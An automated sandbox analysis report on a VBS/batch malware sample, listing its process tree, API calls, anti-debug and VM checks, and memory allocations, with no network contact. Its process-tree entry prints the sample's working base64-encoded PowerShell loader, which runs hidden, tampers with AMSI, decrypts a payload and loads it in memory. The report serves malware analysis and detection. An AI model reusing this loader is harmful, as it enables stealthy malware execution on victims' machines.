Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 26, 2025, 1:23 p.m.	March 26, 2025, 1:25 p.m.

Size	35.1KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`4afad6366d8fb4b51b9b644bd3bbb275`
SHA256	`168c048aa7ca05f48086bf8ed7fe8886a6e220e2b5d123b56db4932ab04aec5b`
CRC32	`6C21036E`
ssdeep	`768:h8Jq1EZyHe8+632JWihztwufWpMFzRcknrr4mTQzBNKbm8YKi8XzP6Q/i:hERSqhaufWEz+knHl82iT`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\8191032732_1740264845.vbs
2552
- cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\EWVm.bat
  2632
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\EWVm.bat
    2696
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Local\Temp\EWVm.bat';iex ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("cG93ZXJzaGVsbCAtdyBoaWRkZW47aWV4ICgoJChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnYVZOVVVrbE9SMUpCVGtSUFRXVlRWRkpKVGtkU1FVNUVUMDE0VTFSU1NVNUhVa0ZPUkU5TklDaFRWRkpKVGtkU1FVNUVUMDBvVTFSU1NVNUhVa0ZPUkU5TmFWTlVVa2xPUjFKQlRrUlBUWGRUVkZKSlRrZFNRVTVFVDAxeVUxUlNTVTVIVWtGT1JFOU5JQzFUVkZKSlRrZFNRVTVFVDAxVlUxUlNTVTVIVWtGT1JFOU5jMU5VVWtsT1IxSkJUa1JQVFdWVFZGSkpUa2RTUVU1RVQwMUNVMVJTU1U1SFVrRk9SRTlOWVZOVVVrbE9SMUpCVGtSUFRYTlRWRkpKVGtkU1FVNUVUMDFwVTFSU1NVNUhVa0ZPUkU5TlkxTlVVa2xPUjFKQlRrUlBUVkJUVkZKSlRrZFNRVTVFVDAxaFUxUlNTVTVIVWtGT1JFOU5jbE5VVWtsT1IxSkJUa1JQVFhOVFZGSkpUa2RTUVU1RVQwMXBVMVJTU1U1SFVrRk9SRTlOYmxOVVVrbE9SMUpCVGtSUFRXZFRWRkpKVGtkU1FVNUVUMDBnSWxOVVVrbE9SMUpCVGtSUFRXaFRWRkpKVGtkU1FVNUVUMDEwVTFSU1NVNUhVa0ZPUkU5TmRGTlVVa2xPUjFKQlRrUlBUWEJUVkZKSlRrZFNRVTVFVDAwNlUxUlNTVTVIVWtGT1JFOU5MMU5VVWtsT1IxSkJUa1JQVFM5VFZGSkpUa2RTUVU1RVQwMDRVMVJTU1U1SFVrRk9SRTlOTjFOVVVrbE9SMUpCVGtSUFRTNVRWRkpKVGtkU1FVNUVUMDB4VTFSU1NVNUhVa0ZPUkU5Tk1sTlVVa2xPUjFKQlRrUlBUVEZUVkZKSlRrZFNRVTVFVDAwdVUxUlNTVTVIVWtGT1JFOU5OMU5VVWtsT1IxSkJUa1JQVFRsVFZGSkpUa2RTUVU1RVQwMHVVMVJTU1U1SFVrRk9SRTlOTVZOVVVrbE9SMUpCVGtSUFRUQlRWRkpKVGtkU1FVNUVUMDB6VTFSU1NVNUhVa0ZPUkU5TkwxTlVVa2xPUjFKQlRrUlBUV1JUVkZKSlRrZFNRVTVFVDAxdlUxUlNTVTVIVWtGT1JFOU5kMU5VVWtsT1IxSkJUa1JQVFc1VFZGSkpUa2RTUVU1RVQwMXNVMVJTU1U1SFVrRk9SRTlOYjFOVVVrbE9SMUpCVGtSUFRXRlRWRkpKVGtkU1FVNUVUMDFrVTFSU1NVNUhVa0ZPUkU5TkwxTlVVa2xPUjFKQlRrUlBUV0ZUVkZKSlRrZFNRVTVFVDAxaVUxUlNTVTVIVWtGT1JFOU5ZMU5VVWtsT1IxSkJUa1JQVFM1VFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOZUZOVVVrbE9SMUpCVGtSUFRYUlRWRkpKVGtkU1FVNUVUMDBpVTFSU1NVNUhVa0ZPUkU5TktWTlVVa2xPUjFKQlRrUlBUUzVUVkZKSlRrZFNRVTVFVDAxRFUxUlNTVTVIVWtGT1JFOU5iMU5VVWtsT1IxSkJUa1JQVFc1VFZGSkpUa2RTUVU1RVQwMTBVMVJTU1U1SFVrRk9SRTlOWlZOVVVrbE9SMUpCVGtSUFRXNVRWRkpKVGtkU1FVNUVUMDEwVTFSU1NVNUhVa0ZPUkU5TkxsTlVVa2xPUjFKQlRrUlBUVkpUVkZKSlRrZFNRVTVFVDAxbGNHeGhZMlVvSjBGQ1F5Y3NKeWNwS1NBdFJYSnliM0pCWTNScGIyNGdVMmxzWlc1MGJIbERiMjUwYVc1MVpUcz0nKSkpKSAtcmVwbGFjZSAnU1RSSU5HUkFORE9NJywgJycpO3RyeXsgSW52b2tlLVN5c1JvdXRpbmUgLURpc2FibGVTdmMgLUVycm9yQWN0aW9uIFN0b3AgfWNhdGNoeyBXcml0ZS1PdXRwdXQgIm1vZGlmaWVkIEFNU0kiIH07ZnVuY3Rpb24gVkZHS0IoJHBhcmFtX3Zhcil7JGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOyRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzskYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnRWkvNkNIVnl5cjdxczJDaTBSd0JJOERIbHNIUWkwKzVaaitpS1dzNU81MD0nKTskYWVzX3Zhci5JVj1bU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCcyeVAwSHhYWUh6NG8rOVk5YmdneXBRPT0nKTskRE1DT0c9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7JFNEVkJWPSRETUNPRy5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsMCwkcGFyYW1fdmFyLkxlbmd0aCk7JERNQ09HLkRpc3Bvc2UoKTskYWVzX3Zhci5EaXNwb3NlKCk7JFNEVkJWO31mdW5jdGlvbiBkZWNvbXByZXNzX2Z1bmN0aW9uKCRwYXJhbV92YXIpeyRVVFJUVz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOyRMWVhGQT1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JFhXWEFCPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJFVUUlRXLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskWFdYQUIuQ29weVRvKCRMWVhGQSk7JFhXWEFCLkRpc3Bvc2UoKTskVVRSVFcuRGlzcG9zZSgpOyRMWVhGQS5EaXNwb3NlKCk7JExZWEZBLlRvQXJyYXkoKTt9JEhXWFJPPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskcGF5bG9hZDJfdmFyPWRlY29tcHJlc3NfZnVuY3Rpb24gKFZGR0tCIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJEhXWFJPLCA2KS5TdWJzdHJpbmcoMikpKSk7W1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRwYXlsb2FkMl92YXIpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtjbGVhcjs="))) "
      2792
    - powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      2828

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 26, 2025, 1:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 26, 2025, 1:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 26, 2025, 1:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 26, 2025, 1:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 26, 2025, 1:23 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 26, 2025, 1:23 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 26, 2025, 1:23 p.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW March 26, 2025, 1:23 p.m.	buffer: Windows PowerShell Copyright (C) 2009 Microsoft Corporation. All rights reserved. console_handle: 0x00000017	1	1	0
WriteConsoleW March 26, 2025, 1:23 p.m.	buffer: PS C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000003	1	1	0

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407d40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407d40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407d40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00407e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408b00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 26, 2025, 1:23 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00408b00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 26, 2025, 1:23 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 129 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bc1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bc2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0235a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0236b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02367000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02352000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02365000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0235c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0236c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02353000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02354000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02355000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02356000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02357000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02358000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02359000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05050000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05051000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05052000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05053000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05054000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05055000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05056000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05057000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05058000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05059000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0505a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 26, 2025, 1:23 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0505b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
